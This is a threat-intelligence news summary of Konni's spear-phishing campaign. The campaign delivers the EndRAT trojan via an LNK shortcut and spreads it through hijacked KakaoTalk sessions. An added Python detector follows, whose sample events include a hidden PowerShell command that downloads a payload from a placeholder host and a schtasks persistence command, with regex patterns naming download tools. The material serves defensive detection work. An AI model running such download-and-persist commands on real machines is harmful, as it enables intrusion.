Konni Deploys EndRAT Through Spear-Phishing, Uses KakaoTalk to Propagate Malware
"Initial access was achieved through a spear-phishing email disguised as a notice appointing the recipient as a North Korean human rights lecturer. After the spear-phishing attack succeeded, the victim executed a malicious LNK file, resulting in infection with remote access malware. The malware remained concealed and persistent on the victim's endpoint for an extended period, stealing internal documents and sensitive information."
"The threat actor is said to have remained on the compromised host for an extended period of time, leveraging the unauthorized access to siphon internal documents and make use of the KakaoTalk application to selectively propagate the malware to specific contacts. The attack is notable for abusing the trust associated with compromised victims to deceive and ensnare additional targets."
"The starting point of the latest attack campaign is a spear-phishing email that's used as a ploy to trick recipients into opening a ZIP file attachment containing a Windows shortcut (LNK). Upon execution, the LNK file downloads a next-stage payload from an external server, establishes persistence using scheduled tasks, and ultimately executes the malware."
The North Korea-linked threat actor Konni has been observed delivering the EndRAT remote access trojan through spear-phishing emails disguised as notices appointing the recipient as a North Korean human rights lecturer. The email carries a ZIP attachment containing a Windows shortcut (LNK); when the victim runs it, the LNK fetches a next-stage payload from an external server, sets up persistence with a scheduled task and launches the malware, which then stays hidden on the endpoint for an extended period while exfiltrating internal documents and sensitive information. With the host under control, the attackers abuse the victim's logged-in KakaoTalk desktop application to push the malware to selected contacts, trading on the trust those contacts place in a sender they know. Konni has previously abused KakaoTalk sessions in the same way to send malicious ZIP archives, and has remotely wiped Android devices using stolen credentials.
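For a defender, the actionable part of the chain above is its process lineage: explorer.exe launches the LNK target (a script host) whose command line fetches something from the internet, and shortly afterwards schtasks.exe registers a task from that process's subtree. The following is an added example, not code from The Hacker News article or the research it reports, and it contains no real Konni indicators: it runs that heuristic over a handful of constructed Sysmon-style process-creation events. Field names, the `stage.example.invalid` host, the task names and all process ids are assumptions made for the illustration.

```python
"""Heuristic detector for the LNK -> download -> scheduled-task chain.

Added example, not code from the article or the research it cites. Input is
a list of constructed Sysmon-style process-creation events (field names are
assumed); nothing here is real Konni telemetry.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime      # process creation time
    pid: int          # process id (assumed unique within the sample)
    ppid: int         # parent process id
    image: str        # full path of the executable
    cmdline: str      # command line as logged


# Interpreters an LNK target commonly points at; explorer.exe spawns the
# target when the user double-clicks the shortcut.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}

# Command-line cues for fetching a next-stage payload from an external server.
DOWNLOAD_CUES = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"bitsadmin|start-bitstransfer|certutil.*urlcache|https?://", re.I)

# schtasks.exe registering a new task: the persistence step.
SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\b.*?/create\b", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestor_pids(ev: ProcEvent, by_pid: dict, max_depth: int = 32) -> set:
    """Pids on ev's parent chain; bounded so a malformed ppid loop cannot hang."""
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen and len(seen) < max_depth:
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return seen


def detect_lnk_chain(events, window: timedelta = timedelta(minutes=5)):
    """Return (downloader, schtasks) pairs: a script host spawned by explorer.exe
    whose command line fetches something, followed within `window` by a
    schtasks /create launched from that process's subtree."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if basename(e.image) not in SCRIPT_HOSTS:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) != "explorer.exe":
            continue
        if not DOWNLOAD_CUES.search(e.cmdline):
            continue
        for t in events:
            if not (e.ts <= t.ts <= e.ts + window):
                continue
            if basename(t.image) != "schtasks.exe" or not SCHTASKS_CREATE.search(t.cmdline):
                continue
            if e.pid in ancestor_pids(t, by_pid):
                hits.append((e, t))
    return hits


T0 = datetime(2025, 1, 1, 10, 0, 0)
SAMPLE_EVENTS = [  # constructed sample, not real telemetry
    ProcEvent(T0, 400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # LNK target: hidden PowerShell fetching the next stage
    ProcEvent(T0 + timedelta(seconds=5), 1200, 400,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest '
              r'http://stage.example.invalid/s2 -OutFile $env:TEMP\s2.exe"'),
    # persistence registered from that PowerShell process
    ProcEvent(T0 + timedelta(seconds=9), 1300, 1200,
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 10 /tn "Update" /tr "%TEMP%\s2.exe" /f'),
    # benign: user runs a local script, no download, no task
    ProcEvent(T0 + timedelta(minutes=3), 1400, 400,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    # benign: a task is created, but not under an explorer-launched downloader
    ProcEvent(T0 + timedelta(minutes=4), 1500, 1400,
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc daily /tn "Backup" /tr C:\scripts\backup.ps1'),
]

if __name__ == "__main__":
    for dl, task in detect_lnk_chain(SAMPLE_EVENTS):
        print(f"[!] pid {dl.pid} ({basename(dl.image)}) fetched a payload; "
              f"pid {task.pid} then ran: {task.cmdline}")
```

Only the PowerShell that both downloads and has a schtasks /create in its subtree is flagged; the local script and the unrelated task creation are not. Real telemetry needs two refinements this toy skips: key the process map on (pid, creation time) rather than pid alone, since pids are reused, and treat the explorer.exe parent as a heuristic for "user opened a shortcut" rather than proof, because a payload can also launch the same chain from a dropped executable.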
Read at The Hacker News